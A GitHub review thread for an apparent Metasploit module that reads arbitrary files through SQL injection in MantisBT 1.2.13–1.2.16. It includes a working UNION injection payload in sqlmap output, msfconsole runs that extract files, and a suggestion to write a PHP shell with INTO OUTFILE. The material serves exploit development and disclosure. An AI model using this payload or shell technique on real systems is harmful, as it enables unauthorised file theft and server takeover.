MantisBT 1.2.13-1.2.16 Arbitrary File Read via SQLi

[brandonprry]

http://www.mantisbt.org/bugs/view.php?id=17055

This module exploits the above vulnerability to read arbitrary files from the file system.

Can download vulnerable releases here:

http://sourceforge.net/projects/mantisbt/files/mantis-stable/

[brandonprry]

DID YOU KNOW:

Some species of Mantis are only females, and they give birth to exact clones of themselves (asexually).

[brandonprry]

FWIW the version that is fixed is 1.2.17 and has been officially released by the MantisBT team:

http://seclists.org/oss-sec/2014/q1/490

[thelightcosine]

please use .match instead of automatch variables here

[brandonprry]

Sure thing.

[wchen-r7]

msftidy run:

$ tools/msftidy.rb modules/auxiliary/gather/mantisbt_admin_sqli.rb 
modules/auxiliary/gather/mantisbt_admin_sqli.rb:70 - [WARNING] Line exceeding 200 bytes
modules/auxiliary/gather/mantisbt_admin_sqli.rb - [WARNING] Module contains old license comment, use tools/dev/resplat.rb <filename>

[brandonprry]

All of the comments should be addressed now. Let me know if you see any more issues!

Sent from a computer

On Mar 4, 2014, at 11:49 AM, sinn3r notifications@github.com wrote:

msftidy run:

$ tools/msftidy.rb modules/auxiliary/gather/mantisbt_admin_sqli.rb
modules/auxiliary/gather/mantisbt_admin_sqli.rb:70 - [WARNING] Line exceeding 200 bytes
modules/auxiliary/gather/mantisbt_admin_sqli.rb - [WARNING] Module contains old license comment, use tools/dev/resplat.rb
—
Reply to this email directly or view it on GitHub.

[wchen-r7]

Which version uses the default password "password"? I'm testing on 1.2.16 and the default password is "root".

[brandonprry]

The default password is not password. Sorry, that is a remnant of development. Let me change it to root.

[wchen-r7]

Thanks.

[wchen-r7]

I tried to read a different file other than /etc/passwd, and I'd get nothing: 'qgjuq qirpq'. For example: I created a file like this: echo hello > /tmp/test.txt, and then on msfconsole I did set filepath /tmp/test.txt, I got nothing.

Can you please try to read a different file and see if it works?

[brandonprry]

Yes, but it may be a bit before I can test... That is odd, I am sure I had tested that.

[brandonprry]

Testing now, give me a few

[brandonprry]

You are right, it looks like it has issues with other files, but I am not sure why. Even sqlmap cannot download anything except the /etc/passwd file, which is quite weird. Still digging...

bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --skip=save,filter_user_id,filter_project_id --technique=u --union-char=11 --file-read=/tmp/passwd

    sqlmap/1.0-dev-f97fcb7 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:35:57

[13:35:57] [INFO] parsing HTTP request from '/tmp/req.req'
[13:35:57] [INFO] resuming back-end DBMS 'mysql' 
[13:35:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: filter_config_id
    Type: UNION query
    Title: MySQL UNION query (11) - 6 columns
    Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-9959' UNION ALL SELECT 11,11,11,11,CONCAT(0x71676a7571,0x5558706e456e484d715a,0x7169727071),11#&apply_filter_button=Apply Filter
---
[13:35:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: PHP 5.4.9, Apache 2.2.22
back-end DBMS: MySQL 5
[13:35:57] [INFO] fingerprinting the back-end DBMS operating system
[13:35:57] [INFO] the back-end DBMS operating system is Linux
[13:35:57] [INFO] fetching file: '/tmp/passwd'
[13:35:57] [WARNING] there was a problem decoding value '  ' from expected hexadecimal form
do you want confirmation that the remote file '/tmp/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[13:36:05] [WARNING] reflective value(s) found and filtering out
[13:36:05] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
files saved to [1]:
[*] /home/bperry/tools/sqlmap/output/172.31.16.109/files/_tmp_passwd (size differs from remote file)

[13:36:05] [INFO] fetched data logged to text files under '/home/bperry/tools/sqlmap/output/172.31.16.109'

[*] shutting down at 13:36:05

bperry@ubuntu:~/tools/sqlmap$ cat /home/bperry/tools/sqlmap/output/172.31.16.109/files/_tmp_passwd
bperry@ubuntu:~/tools/sqlmap$ 

[brandonprry]

I believe we are running into this bug:

http://bugs.mysql.com/bug.php?id=38403

Going to install on CentOS and see if that changes the behavior. LOAD_FILE is apparently very buggy.

FWIW I tried disabling apparmor as well to no avail. IIRC my original testing was on centos 6.5, and I am sure that /tmp was able to be read from.

[brandonprry]

BTW I am assuming you threw together an Ubuntu vm to repro this?

[wchen-r7]

Yeah, Ubuntu 12.04.4 LTS

[brandonprry]

Yep, throwing up a CentOS vm now, will install and test. Give me a few. Should have results by 5.

[infodox]

Uh. If you can do a SELECT LOAD_FILE("/etc/passwd"); you can do a SELECT "" INTO OUTFILE "/some/writeable/web/dir/file.php"; and just drop a shellstager... Right? So why not that?

[wchen-r7]

@infodox That is assuming you have WRITE permission and that AppArmor allows it, which by default doesn't.

[brandonprry]

Yes, I cannot write to the FS, only read. On CentOS (with SELinux disabled) I can read files from /tmp as well.

msf auxiliary(mantisbt_admin_sqli) > show options

Module options (auxiliary/gather/mantisbt_admin_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   FILEPATH   /tmp/fdsa          yes       Path to remote file
   PASSWORD   root               yes       Single password
   Proxies                       no        Use a proxy chain
   RHOST      172.31.16.115      yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /mantisbt-1.2.16/  yes       Relative URI of MantisBT installation
   USERNAME   administrator      yes       Single username
   VHOST                         no        HTTP server virtual host

msf auxiliary(mantisbt_admin_sqli) > run

[+] File saved to: /home/bperry/.msf4/loot/20140304143918_default_172.31.16.115_mantisbt.file_538855.txt
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_admin_sqli) > cat /home/bperry/.msf4/loot/20140304143918_default_172.31.16.115_mantisbt.file_538855.txt
[*] exec: cat /home/bperry/.msf4/loot/20140304143918_default_172.31.16.115_mantisbt.file_538855.txt

This is a tmp file
msf auxiliary(mantisbt_admin_sqli) > 

[wchen-r7]

Ok, so that's probably an issue with load_file on ubuntu then. Since that's the only problem I've found and it's not your fault, I'd like to go ahead and land it if you don't mind.

[brandonprry]

Go for it!

Sent from a computer

On Mar 4, 2014, at 4:56 PM, sinn3r notifications@github.com wrote:

Ok, so that's probably an issue with load_file on ubuntu then. Since that's the only problem I've found and it's not your fault, I'd like to go ahead and land it if you don't mind.

—
Reply to this email directly or view it on GitHub.